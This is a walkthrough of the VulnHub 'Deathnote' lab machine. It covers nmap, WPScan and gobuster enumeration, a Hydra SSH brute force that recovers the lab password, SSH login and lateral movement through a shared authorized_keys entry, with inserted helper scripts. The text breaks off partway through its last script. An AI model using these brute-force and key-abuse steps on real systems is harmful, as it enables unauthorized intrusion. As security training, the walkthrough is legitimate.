Deathnote:1 || VulnHub Complete Walkthrough

In this article, we are going to tackle a VulnHub machine rated Easy. First, download the OVA image from VulnHub.


Once downloaded, the machine needs to be imported into a hypervisor; this is straightforward in VirtualBox.


Setting Up

Launch VirtualBox, click on Tools, then on “Import”, and import the OVA file.

Once imported, open the machine's Settings and change the Network Adapter to a Host-only adapter.

Make sure your Kali Linux machine, from which you perform the attack, and the vulnerable machine are on the same network.

Once everything is set up, start both virtual machines.

The vulnerable machine boots to a login screen prompting for a username and password. We will not use it; the goal is to gain access over the network.


Enumeration

Our first step is to identify the IP address of the target machine using netdiscover, which sends and listens for ARP traffic on the host-only interface. Open a terminal and run the following command:

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.174.0/16   |   Screen View: Unique Hosts                                                          
                                                                                                                               
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.162.1   0a:00:27:00:00:07      1      60  Unknown vendor                                                              
 192.168.162.2   08:00:27:b2:a3:05      1      60  PCS Systemtechnik GmbH                                                      
  192.168.162.6   08:00:27:cf:c2:1c      1      60  PCS Systemtechnik GmbH      

From the scan results, our target is 192.168.162.6. The 08:00:27 MAC prefix identifies a VirtualBox virtual NIC (PCS Systemtechnik GmbH is the vendor string registered for VirtualBox); 192.168.162.1 is typically the host-only adapter of the Kali host and 192.168.162.2 the VirtualBox DHCP server, which leaves .6 as the only other guest.


Network Discovery with Nmap

Next, let's scan the target to find out which ports are open. Port scanning is an essential part of enumeration: it maps the attack surface so that we can design targeted attacks. As usual, we use Nmap with the following options:

  • -sS: TCP SYN scan, the default (and fastest) scan type when running as root.
  • -sC: Run the default set of NSE scripts against the discovered services.
  • -sV: Version detection, to identify the software and version listening on each open port.
  • -p-: Scan all 65535 TCP ports instead of the default top 1000.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -p- 192.168.162.6
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 15:42 EDT
Nmap scan report for 192.168.162.6
Host is up (0.00094s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
|   256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_  256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:CF:C2:1C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$

The scan reveals two open ports. Note that a true -p- run reports “Not shown: 65533 closed tcp ports”; this output shows 998, so only the default top 1000 ports were covered here, and a full-range scan is worth repeating on a real target.

  • 22/TCP: OpenSSH 7.9p1, which gives us a way onto the box if we obtain valid credentials or a trusted private key.
  • 80/TCP: Apache 2.4.38 serving a site with no title, which is where we focus our web enumeration.

Web Enumeration

So, let's take a look at the web content on port 80. Open a browser of your choice and navigate to the target's IP address.

Upon attempting to access the page, we are presented with the following error: the browser cannot connect to the server at "deathnote.vuln".

The site redirects the request from the IP address to the hostname deathnote.vuln, and our attacking machine has no way to resolve that name, since there is no DNS record for it on the host-only network. The browser therefore fails on the redirect, exactly as it would for a mistyped hostname.

Resolving Server Connection Issues by Modifying the Hosts File

This is fixed by adding a static mapping to the local hosts file, /etc/hosts, which the resolver consults before DNS. Open a terminal and add the target IP address with its hostname so that the browser can reach the site that previously failed:

┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts
[sudo] password for kali:
127.0.0.1       localhost
127.0.1.1       kali
192.168.162.6   deathnote.vuln


::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Save with CTRL + O, confirm with Enter, and exit with CTRL + X. You can verify the entry with the following command:

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
192.168.162.6   deathnote.vuln


::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

                                                                                                                                
┌──(kali㉿kali)-[~]
└─$

With the mapping in place, reload the page. Since the hostname now resolves locally, the site loads without any issues.

The browser ends up at http://deathnote.vuln/wordpress/, which indicates that the site is built on the WordPress CMS.

WordPress sites are a common target: outdated core versions, themes and plugins are frequently left exposed. So we ran WPScan against the target to enumerate the installation and spot known weaknesses.


WordPress Security Assessment with WPScan

WPScan is a black-box WordPress vulnerability scanner written in Ruby. It identifies the WordPress version, enumerates themes and plugins and reports whether they are outdated or known to be vulnerable, checks for common misconfigurations such as exposed readme files, configuration backups and directory listings, and can brute-force logins. Vulnerability data for the detected versions is only printed when an API token from wpscan.com is supplied.


┌──(kali㉿kali)-[~]
└─$ wpscan --url http://deathnote.vuln/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://deathnote.vuln/wordpress/ [192.168.162.6]
[+] Started: Wed Sep  7 15:49:36 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://deathnote.vuln/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://deathnote.vuln/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://deathnote.vuln/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Rss Generator (Passive Detection)
 |  - http://deathnote.vuln/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.8</generator>
 |  - http://deathnote.vuln/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:02 <=================================================> (137 / 137) 100.00% Time: 00:00:02

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Sep  7 15:49:49 2022
[+] Requests Done: 186
[+] Cached Requests: 5
[+] Data Sent: 48.786 KB
[+] Data Received: 19.153 MB
[+] Memory used: 240.469 MB
[+] Elapsed time: 00:00:12
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

The scan was run without a WPScan API token, so no CVE data is printed; the output does not confirm an exploitable core vulnerability, but it flags WordPress 5.8 as an outdated release and reports several misconfigurations that can help us gain a foothold:

  • Headers: the Server header reveals Apache 2.4.38 on Debian.
  • XML-RPC is enabled. It allows login attempts to be batched, but it is of no use until we have candidate usernames and passwords.
  • readme.html is accessible, which documents the installation and confirms the WordPress version.
  • Directory listing is enabled on wp-content/uploads/, so we can browse every uploaded file directly in the browser.

The remaining findings (WP-Cron, an outdated theme) are worth a look as well. Next, let's enumerate the target for hidden or unlinked directories and pages by directory busting.


Discovery of Hidden Directories and files with Gobuster

Using gobuster as our tool of choice, we use the following options:

  • dir: Used to specify the mode of enumeration, 
  • -u:  Used to specify the target URL, 
  • -w: Used to specify the path of the wordlist.

┌──(kali㉿kali)-[~]
└─$ gobuster dir --url http://deathnote.vuln/wordpress/ --wordlist /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://deathnote.vuln/wordpress/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/07 15:52:58 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/index.php            (Status: 301) [Size: 0] [--> http://deathnote.vuln/wordpress/]
/wp-admin             (Status: 301) [Size: 329] [--> http://deathnote.vuln/wordpress/wp-admin/]
/wp-content           (Status: 301) [Size: 331] [--> http://deathnote.vuln/wordpress/wp-content/]
/wp-includes          (Status: 301) [Size: 332] [--> http://deathnote.vuln/wordpress/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]                                                    
                                                                                                  
===============================================================
2022/09/07 15:53:03 Finished
===============================================================
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$

Directory busting returns the standard WordPress layout, including the wp-admin login page. Without a valid username and password we cannot log in, though.

So far we have only busted the /wordpress/ directory. The web root of deathnote.vuln may hold other hidden or unlinked directories and pages, so let's scan it as well.

┌──(kali㉿kali)-[~]
└─$ gobuster dir --url http://deathnote.vuln/ --wordlist /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://deathnote.vuln/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/07 15:54:03 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 197]
/manual               (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/robots.txt           (Status: 200) [Size: 68]                                     
/server-status        (Status: 403) [Size: 279]                                    
/wordpress            (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
                                                                                      
===============================================================
2022/09/07 15:54:08 Finished
===============================================================
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

The web root contains a “robots.txt” file. Let's dig into it and find out whether it holds anything sensitive that might help with a foothold.

robots.txt gives us another hint: it references an image file, important.jpg, that appears to have been left on the server by mistake. So let us open ‘important.jpg’ in the browser.

The browser fails to render it as an image. So let's download the file to the Kali machine for further analysis. Open a new terminal and type the following command:

┌──(kali㉿kali)-[~]
└─$ wget http://192.168.162.6/important.jpg 
--2022-09-07 15:58:10--  http://192.168.162.6/important.jpg
Connecting to 192.168.162.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 277 [image/jpeg]
Saving to: ‘important.jpg’

important.jpg                   100%[=======================================================>]     277  --.-KB/s    in 0s      

2022-09-07 15:58:10 (23.7 MB/s) - ‘important.jpg’ saved [277/277]

                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

The file is saved in the current working directory, the Kali user's home.

Opening the downloaded copy from there gives the same error.


Analyzing File Types with the 'file' Command

Something is off with this file, so let's run the file command, which identifies a file by its content (its leading magic bytes) rather than by its extension.

┌──(kali㉿kali)-[~]
└─$ file important.jpg
important.jpg: ASCII text
┌──(kali㉿kali)-[~]
└─$

The output shows the file is ASCII text, not a JPEG: the .jpg extension is a decoy. Rename it to important.txt (as it appears in the later directory listing) or simply cat it, and read the hint.
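To see what file(1) is doing here, the following Python script identifies a file by its leading bytes, the way file does, and flags a mismatch between extension and content. It is an added example, not part of the original walkthrough: the magic signatures are the standard ones for a handful of formats, and the two sample inputs are constructed for the example rather than taken from the target.

```python
"""Added example: identify a file by its leading bytes, as file(1) does,
instead of trusting its extension. Signatures are the standard ones for a
few common formats; sample inputs are constructed for this example and are
not the actual important.jpg from the target."""

# (label, offset, signature bytes) for a handful of well-known formats
MAGIC = [
    ("jpeg", 0, b"\xff\xd8\xff"),
    ("png", 0, b"\x89PNG\r\n\x1a\n"),
    ("gif", 0, b"GIF87a"),
    ("gif", 0, b"GIF89a"),
    ("pdf", 0, b"%PDF-"),
    ("zip", 0, b"PK\x03\x04"),
    ("elf", 0, b"\x7fELF"),
]

# Extensions and the content type they claim to carry
EXT_TO_LABEL = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif",
                "pdf": "pdf", "zip": "zip"}


def identify(data: bytes) -> str:
    """Return a content label for `data` from its magic bytes.

    Falls back to file(1)'s notion of "ASCII text" (only printable ASCII
    plus tab/newline/CR) and otherwise to the opaque label "data".
    """
    if not data:
        return "empty"
    for label, offset, sig in MAGIC:
        if data[offset:offset + len(sig)] == sig:
            return label
    if all(32 <= b < 127 or b in b"\t\n\r" for b in data):
        return "ascii-text"
    return "data"


def extension_matches(filename: str, data: bytes) -> bool:
    """True when the extension's claimed type agrees with the sniffed content."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXT_TO_LABEL.get(ext)
    return claimed is not None and claimed == identify(data)


def triage(files: dict) -> dict:
    """Map each filename to (detected label, extension agrees?)."""
    return {name: (identify(data), extension_matches(name, data))
            for name, data in files.items()}


# Constructed samples: a minimal JFIF header, and a text hint disguised as .jpg
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 16
SAMPLE_FAKE_JPEG = b"this is a text hint, not an image\n"

if __name__ == "__main__":
    report = triage({"photo.jpg": SAMPLE_JPEG, "important.jpg": SAMPLE_FAKE_JPEG})
    for name, (label, ok) in report.items():
        print(f"{name}: {label} ({'extension ok' if ok else 'extension mismatch'})")
```

The same idea scales to an uploads directory: run triage() over every file and review anything whose extension disagrees with its content, which is how a decoy like important.jpg stands out among real images.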

The hint points us toward the WordPress uploads. Earlier, while browsing the upload directory listing, we saw a “user.txt” file.

Let us open the “user.txt” file in a new tab.

A few usernames are listed in this wordlist. If we also had a wordlist of passwords, we could brute-force a login to the machine.


Foothold

While exploring the upload directory, I noticed a “notes.txt” file that looks like a wordlist of passwords.

Now we have wordlists for both usernames and passwords, so let's brute-force SSH to find a valid username and password pair.

First, download both files with the wget command-line utility.

┌──(kali㉿kali)-[~]
└─$ wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
--2022-09-07 16:01:40--  http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
Resolving deathnote.vuln (deathnote.vuln)... 192.168.162.6
Connecting to deathnote.vuln (deathnote.vuln)|192.168.162.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 449 [text/plain]
Saving to: ‘notes.txt’

notes.txt                       100%[=======================================================>]     449  --.-KB/s    in 0s      

2022-09-07 16:01:40 (35.0 MB/s) - ‘notes.txt’ saved [449/449]

                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt 
--2022-09-07 16:02:33--  http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
Resolving deathnote.vuln (deathnote.vuln)... 192.168.162.6
Connecting to deathnote.vuln (deathnote.vuln)|192.168.162.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [text/plain]
Saving to: ‘user.txt’

user.txt                        100%[=======================================================>]      91  --.-KB/s    in 0s      

2022-09-07 16:02:33 (8.03 MB/s) - ‘user.txt’ saved [91/91]

                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ ls
Desktop  Documents  Downloads  important.txt  Music  notes.txt   Pictures  Public  Templates  user.txt   Videos


Hydra-Enabled SSH Bruteforce Attack and Access Acquisition

The most commonly used tool for this is Hydra, which brute-forces logins against many network protocols using wordlists.

  • -L: Load usernames from the specified wordlist.
  • -P: Load passwords from the specified wordlist.

With 17 usernames and 43 passwords the search space is 731 attempts. Hydra also warns that many SSH servers cap parallel unauthenticated connections (MaxStartups in sshd_config); if attempts start erroring out, reduce parallelism with -t 4. On a real engagement, account lockout policies make this kind of online attack far more visible and risky than it is against a lab machine.

┌──(kali㉿kali)-[~]
└─$ hydra -L user.txt -P notes.txt ssh://192.168.162.6
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-07 16:05:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43), ~46 tries per task
[DATA] attacking ssh://192.168.162.6:22/
[STATUS] 271.00 tries/min, 271 tries in 00:01h, 463 to do in 00:02h, 13 active
[22][ssh] host: 192.168.162.6   login: l   password: death4me
[STATUS] 277.50 tries/min, 555 tries in 00:02h, 179 to do in 00:01h, 13 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-07 16:08:08
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

Hydra found one valid username and its password, shown on the highlighted line:

[22][ssh] host: 192.168.162.6   login: l    password: death4me

With a valid username and password, we can log into the server over SSH.

┌──(kali㉿kali)-[~]
└─$ ssh l@192.168.162.6
The authenticity of host '192.168.162.6 (192.168.162.6)' can't be established.
ED25519 key fingerprint is SHA256:Pj7G++7sat/zpoeFTsy5FUba1luVvaIo7NG0PdXzxY8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.162.6' (ED25519) to the list of known hosts.
l@192.168.162.6's password: death4me
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:12:29 2021 from 192.168.1.6
l@deathnote:~$ 

The login was successful. List the home directory and read the user flag.

l@deathnote:~$ ls                                                                                                                
user.txt                                                                                                                         
l@deathnote:~$ cat user.txt                                                                                                     
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------. 
l@deathnote:~$ 


Decoding the Brainfuck Program

The user flag is not an encrypted text but a program in Brainfuck, an eight-instruction language whose symbols (+ - < > [ ] . ,) manipulate a tape of byte cells; running the program prints the hidden message. You can paste it into an online Brainfuck interpreter or run it locally.

The message that appears is a note from kira rather than a credential, so we move on to privilege escalation.
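Instead of relying on an online decoder, the flag can be run locally with a small Brainfuck interpreter. The following Python script is an added example, not part of the original walkthrough; the only program text it embeds is the user.txt content printed by cat above, and the cell and tape semantics (8-bit wrapping cells, 30000-cell tape, EOF reads as 0) are the conventional ones.

```python
"""Added example: a minimal Brainfuck interpreter used to decode user.txt
offline. USER_FLAG is the program printed by `cat user.txt` on the target."""


def run_brainfuck(code: str, input_bytes: bytes = b"", tape_size: int = 30000) -> str:
    """Execute a Brainfuck program and return everything it writes as text.

    Cells are 8-bit and wrap around; the pointer is bounds-checked so a
    malformed program raises instead of reading outside the tape.
    """
    # Pre-compute matching brackets: jumps become O(1) and unbalanced
    # brackets are rejected before execution starts.
    jumps, stack = {}, []
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {pos}")
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = bytearray(tape_size)
    ptr = pc = 0
    inp = iter(input_bytes)
    out = bytearray()
    while pc < len(code):
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("pointer moved past end of tape")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("pointer moved before start of tape")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)  # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # jump back to the matching '['
        # any other character is a comment and is ignored
        pc += 1
    return out.decode("latin-1")


# The user flag exactly as printed by `cat user.txt` on the target
USER_FLAG = "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------."

if __name__ == "__main__":
    print(run_brainfuck(USER_FLAG))
```

Running the block prints kira's note: i think u got the shell , but you wont be able to kill me -kira. The first loop seeds four cells with 10, 30, 70 and 100 and the rest of the program nudges those values up and down to spell each character, which is why the text looks like noise until it is executed.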


Privilege Escalation

Let's run the id command to see the current user's UID, GID and group memberships.

l@deathnote:~$ id
uid=1000(l) gid=1000(l) groups=1000(l),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)   
l@deathnote:~$

User l is not a member of the sudo group, so we gather further information about the machine that could be useful for gaining root.

Let's identify the rights, and privileges of the current user by executing the sudo -l command. 

l@deathnote:~$ sudo -l
[sudo] password for l: 
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$

User l may not run sudo at all. So we look for another account that may hold higher privileges.


Lateral Movement to kira via a Reused SSH Key

To find other accounts on the system, list the home directories under /home:

l@deathnote:~$ cd /home
l@deathnote:/home$ ls -al
total 16
drwxr-xr-x  4 root root 4096 Jul 19  2021 .
drwxr-xr-x 18 root root 4096 Jul 19  2021 ..
drwxr-xr-x  4 kira kira 4096 Sep  4  2021 kira
drwxr-xr-x  4 l    l    4096 Sep  4  2021 l
l@deathnote:/home$

There are two home directories, kira and l. The other account, kira, is the next target; it may hold privileges that l lacks.

We cannot log in as kira yet, but the directory is world-readable (mode 755), so we can still list its contents.

l@deathnote:/home/kira$ ls -al                                                                                                  
total 32
drwxr-xr-x 4 kira kira 4096 Sep  4  2021 .
drwxr-xr-x 4 root root 4096 Jul 19  2021 ..
-rw------- 1 kira kira    0 Sep  4  2021 .bash_history
-rw-r--r-- 1 kira kira  220 Jul 19  2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19  2021 .bashrc
-rwx------ 1 kira root   85 Aug 29  2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19  2021 .local
-rw-r--r-- 1 kira kira  807 Jul 19  2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19  2021 .ssh
l@deathnote:/home/kira$

Apart from the usual dotfiles, the only file is kira.txt, owned by kira with mode 700. Let's try to read it.

l@deathnote:/home/kira$ cat kira.txt  
cat: kira.txt: Permission denied
l@deathnote:/home/kira$

Permission denied: kira.txt is mode 700 and owned by kira. We need to become kira, but we have no password for that account.

SSH offers another route. The .ssh directory is world-readable as well, and it holds the account's SSH trust configuration.

l@deathnote:/home/kira$ cd .ssh/
l@deathnote:/home/kira/.ssh$ ls -al                                                                                             
total 12                                                                                                                        
drwxr-xr-x 2 kira kira 4096 Jul 19  2021 .                                                                                      
drwxr-xr-x 4 kira kira 4096 Sep  4  2021 ..                                                                                     
-rw-r--r-- 1 kira kira  393 Jul 19  2021 authorized_keys                                                                        
l@deathnote:/home/kira/.ssh$

The ".ssh" directory contains an "authorized_keys" file, i.e. the public keys that sshd will accept for logging in as kira. Let's have a look at it.

l@deathnote:/home/kira/.ssh$ cat authorized_keys                                                                                
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote                                                                                                                        
l@deathnote:/home/kira/.ssh$

The single entry is an RSA public key whose comment is l@deathnote, and its length (393 bytes) matches the id_rsa.pub in l's own ~/.ssh. In other words, kira trusts l's key pair: the private key ~/.ssh/id_rsa that we already hold as l should log us in as kira without a password. Let's check l's home directory for that key pair.
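Checking that an authorized_keys entry really corresponds to a private key we hold is better done on the key material than on the comment, which anyone can edit. The following Python script is an added example, not taken from the original walkthrough: it parses OpenSSH public-key lines, extracts the RSA parameters, computes the SHA256 fingerprint that ssh-keygen -lf prints, and reports which authorized_keys entries match a given .pub file regardless of comment or leading options. The trusted key embedded below is the one read from /home/kira/.ssh/authorized_keys above; the non-matching key used as a negative case is constructed by altering one modulus byte and is not a real key.

```python
"""Added example: match an authorized_keys entry against a candidate public
key by comparing key blobs and SHA256 fingerprints instead of the comment."""

import base64
import hashlib
import struct

# The entry found in /home/kira/.ssh/authorized_keys on the target
KIRA_AUTHORIZED_KEYS = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZN"
    "h4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAG"
    "HaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V"
    "0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75m"
    "i6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQI"
    "CFZ6z l@deathnote\n"
)


def _read_string(blob: bytes, offset: int):
    """Read one SSH wire-format string: uint32 big-endian length, then bytes."""
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    if start + length > len(blob):
        raise ValueError("truncated key blob")
    return blob[start:start + length], start + length


def fingerprint(blob: bytes) -> str:
    """SHA256 fingerprint in OpenSSH's format (base64 without padding)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


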